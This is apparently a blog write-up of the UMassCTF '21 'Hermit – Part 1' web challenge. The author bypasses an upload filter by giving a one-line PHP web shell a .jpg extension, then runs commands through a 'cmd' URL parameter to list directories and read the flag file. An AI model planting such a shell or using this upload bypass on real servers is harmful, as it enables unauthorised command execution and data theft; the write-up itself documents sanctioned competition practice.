UMassCTF ’21: Web: Hermit – Part 1

This is for the UMassCTF ’21 CTF.

Challenge Author: Cobchise#6969

For this challenge, we are provided the following information:

Here is the hint:

Going to the provided link, we get this page:

I quick test image upload and I see how it works:

It uploaded the file and give a ling to see it. When I click the link to see it, It essentially prints the contents of the file as if it is text:

This tells me that I need to upload a PHP shell script:

I grab my favorite one-line PHP shell and upload it as a .php file:

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Okay, that didn’t work, so I change the extension to .jpg.

It took it:

When I click to see the “image” I get this:

No I provide some commands as the expected “cmd” argument:

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=pwd

Beautiful! I have a working shell. After some poking around, I find the flag:

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=ls%20../../../home/hermit/flag
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=cat%20../../../home/hermit/flag/userflag.txt
UMASS{a_picture_paints_a_thousand_shells}

One thought on “UMassCTF ’21: Web: Hermit – Part 1

Leave a Reply

Your email address will not be published. Required fields are marked *